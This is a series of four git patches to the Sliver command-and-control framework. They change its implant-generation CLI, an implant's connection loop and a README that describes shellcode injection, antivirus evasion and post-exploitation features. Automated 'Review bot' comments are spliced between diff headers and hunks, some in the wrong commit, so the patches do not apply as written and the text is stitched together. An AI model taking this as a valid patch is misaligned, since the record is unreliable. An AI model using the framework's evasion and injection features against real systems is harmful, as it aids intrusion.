From 2ce7823c3ffb24479913f3c91ea5d021d185c7e0 Mon Sep 17 00:00:00 2001
From: moloch
Date: Thu, 14 Feb 2019 21:05:14 -0500
Subject: [PATCH 1/4] ux improvements
---
 client/command/sliver.go | 22 ++++++++++++++++++++--
 1 file changed, 20 insertions(+), 2 deletions(-)
diff --git a/client/command/sliver.go b/client/command/sliver.go
index 5e5ec287e0..bbe69f92dd 100644
--- a/client/command/sliver.go
+++ b/client/command/sliver.go
@@ -194,8 +194,26 @@ func generate(ctx *grumble.Context, rpc RPCServer) {
 save := ctx.Flags.String("save")
- if lhost == "" {
- fmt.Printf(Warn+"Invalid lhost '%s'\n", lhost)
+ /* For UX we convert some synonymous terms */
+ targetOS = strings.ToLower(targetOS)
+ if targetOS == "mac" || targetOS == "macos" || targetOS == "m" {
+ targetOS = "darwin"
+ }
+ if targetOS == "win" || targetOS == "w" || targetOS == "shit" {
+ targetOS = "windows"
+ }
+ if targetOS == "unix" || targetOS == "l" {
+ targetOS = "linux"
+ }
+ if arch == "x64" || strings.HasPrefix(arch, "64") {
+ arch = "amd64"
+ }
+ if arch == "x86" || strings.HasPrefix(arch, "32") {
+ arch = "386"
+ }
+
+ if lhost == "" && dnsParent == "" {
+ fmt.Printf(Warn + "Must specify --lhost or --dns\n")
 return
 }
 if save == "" {
From 438fa60503531113f299abf4dcc439dcc36cac25 Mon Sep 17 00:00:00 2001
From: moloch
Date: Thu, 14 Feb 2019 22:44:32 -0500
Subject: [PATCH 2/4] ux improvements
---
 client/command/sliver.go | 8 +++-----
 server/console/console-players.go | 3 +--
 2 files changed, 4 insertions(+), 7 deletions(-)
diff --git a/client/command/sliver.go b/client/command/sliver.go
index bbe69f92dd..74193c9847 100644
--- a/client/command/sliver.go
+++ b/client/command/sliver.go
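Review bot: After the alias mapping in `generate` there is no final check that `targetOS` and `arch` ended up as supported values, so a typo that matches no alias is passed on unchanged; whether later code rejects it is not visible, because the function continues outside the hunk. `strings.HasPrefix(arch, "64")` and `strings.HasPrefix(arch, "32")` are also broader than the exact-match aliases around them and rewrite any value that merely starts with those digits. Consider closing the block with an explicit check such as `if targetOS != "darwin" && targetOS != "windows" && targetOS != "linux" { fmt.Printf(Warn+"Unsupported --os %q\n", targetOS); return }`, adjusted to the platforms the builder really supports, and an equivalent one for `arch`. The `"shit"` alias for windows is better dropped from a shipped CLI.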
@@ -180,8 +180,8 @@ func info(ctx *grumble.Context, rpc RPCServer) {
 }
 func generate(ctx *grumble.Context, rpc RPCServer) {
- targetOS := ctx.Flags.String("os")
- arch := ctx.Flags.String("arch")
+ targetOS := strings.ToLower(ctx.Flags.String("os"))
+ arch := strings.ToLower(ctx.Flags.String("arch"))
 lhost := ctx.Flags.String("lhost")
 lport := ctx.Flags.Int("lport")
 debug := ctx.Flags.Bool("debug")
@@ -195,7 +195,6 @@ func generate(ctx *grumble.Context, rpc RPCServer) {
 save := ctx.Flags.String("save")
 /* For UX we convert some synonymous terms */
- targetOS = strings.ToLower(targetOS)
 if targetOS == "mac" || targetOS == "macos" || targetOS == "m" {
 targetOS = "darwin"
 }
@@ -217,8 +216,7 @@ func generate(ctx *grumble.Context, rpc RPCServer) {
 return
 }
 if save == "" {
- fmt.Printf(Warn + "Save path required (--save)\n")
- return
+ save, _ = os.Getwd()
 }
 // Make sure we have the FQDN
diff --git a/server/console/console-players.go b/server/console/console-players.go
index 2886ccbd52..224c60be90 100644
--- a/server/console/console-players.go
+++ b/server/console/console-players.go
@@ -74,8 +74,7 @@ func newPlayerCmd(ctx *grumble.Context) {
 }
 if save == "" {
- fmt.Printf(Warn + "Save file required (--save)\n")
- return
+ save, _ = os.Getwd()
 }
 fmt.Printf(Info + "Generating new client certificate, please wait ... \n")
From 09a627e8c13eb910b14c6a20e0c6384c78e3af41 Mon Sep 17 00:00:00 2001
From: moloch
Date: Fri, 15 Feb 2019 10:52:23 -0500
Subject: [PATCH 3/4] fixed bugs in dns-only builds of implant
---
 sliver/sliver.go | 9 ++++++++-
 1 file changed, 8 insertions(+), 1 deletion(-)
diff --git a/sliver/sliver.go b/sliver/sliver.go
index 8e3fc13fb0..1bf4cc3dc9 100644
--- a/sliver/sliver.go
+++ b/sliver/sliver.go
@@ -3,7 +3,10 @@ package main
 import (
 "crypto/x509"
 "flag"
+
+ // {{if .MTLSServer}}
 "io"
+ // {{end}}
 "os"
 "os/user"
 "runtime"
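Review bot: The new default `save, _ = os.Getwd()` in `generate` (client/command/sliver.go, hunk at -217) discards the error, so when the working directory cannot be resolved `save` stays empty and the function carries on with an empty path instead of stopping as the removed lines did. The same line is added to `newPlayerCmd` in server/console/console-players.go, where the output appears to be a freshly generated client certificate, so it is worth being explicit about where that file ends up. Handle the error, and ideally print the resolved path before anything is written. Both functions continue outside their hunks, so how `save` is used afterwards is not visible here.

```go
if save == "" {
	cwd, err := os.Getwd()
	if err != nil {
		fmt.Printf(Warn+"Unable to resolve working directory: %v\n", err)
		return
	}
	save = cwd
}
```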
@@ -71,13 +74,17 @@ func startConnectionLoop() {
 // {{end}}
 connectionAttempts := 0
 for connectionAttempts < maxErrors {
- err := mtlsConnect()
+ var err error
+
+ // {{if .MTLSServer}}
+ err = mtlsConnect()
 if err != nil {
 // {{if .Debug}}
 log.Printf("[mtls] Connection failed %s", err)
 // {{end}}
 }
 connectionAttempts++
+ // {{end}}
 // {{if .DNSParent}}
 if dnsParent != "" {
From 80603d743271b5c18183af01133f0b6be606fb58 Mon Sep 17 00:00:00 2001
From: moloch
Date: Sat, 16 Feb 2019 09:29:11 -0500
Subject: [PATCH 4/4] updated readme
---
 README.md | 33 +++++++++++++++++++++++----------
 1 file changed, 23 insertions(+), 10 deletions(-)
diff --git a/README.md b/README.md
index bb0b5a5134..8f9882d69e 100644
--- a/README.md
+++ b/README.md
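Review bot: `connectionAttempts++` now sits inside the `// {{if .MTLSServer}}` … `// {{end}}` guard in `startConnectionLoop`, so a build rendered without MTLSServer has no increment in the visible part of the loop, and `for connectionAttempts < maxErrors` only ends if the DNS branch below exits or counts attempts itself. The loop body continues outside the hunk, so that cannot be confirmed from here. If the counter is meant to bound retries for every transport, put the closing `// {{end}}` directly after the `if err != nil { … }` block and leave `connectionAttempts++` unguarded. A one-line comment stating that these guards are template directives evaluated at build time would also help the next reader.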
@@ -5,21 +5,34 @@ Sliver Sliver is a remote shellcode loading and injection service that uses end-to-end encryption (mTLS) for all network traffic. Implants are dynamically compiled with unique X.509 certificates signed by a per-instance certificate authority generated when you first run the binary. Sliver can load arbitrary shellcode but also integrates with MSFVenom to automatically generate, execute, and manage Meterpreter payloads. Sliver binaries have very low anti-virus detection as they do not contain any malicous code themselves and instead dynamically load it over the network. -Sliver can inject payloads into it's own process or optionally use remote thread injection to execute payloads in a remote processes to which your execution context has access. +Sliver can inject payloads into it's own process or optionally use remote thread injection to execute payloads in a remote processes to which your execution context has access. -``` -[attacker] <-(mTLS)-> [sliver] -(code injection)-> [remote process] -``` +### Feature Progess -Sliver is designed to be secure-by-default and have as few dependancies as possible. +#### C2 +- [x] Mutual TLS +- [x] Encrypted DNS +- [ ] HTTP(S) +- [ ] ICMP -### Setup +#### Chain Loader +- [x] Raw Shellcode +- [x] .NET Assemblies +- [x] Metasploit/Meterpreter (v5 or later) +- [ ] Empire +- [ ] Cobalt Strike -1. Install Metasploit Framework v5 or later (if you want to use MSF features) -2. Download the latest [Sliver](https://github.com/BishopFox/sliver/releases) binary -3. ??? -4. Shellz +#### Post Exploitation +- [x] Windows Token Manipulation +- [x] Procdump +- [ ] TCP tunnels +- [ ] Reverse SOCKS proxy + +### Setup +1. Download the latest [Sliver](https://github.com/BishopFox/sliver/releases) binary +2. ??? +3. Shellz ## Compile From Source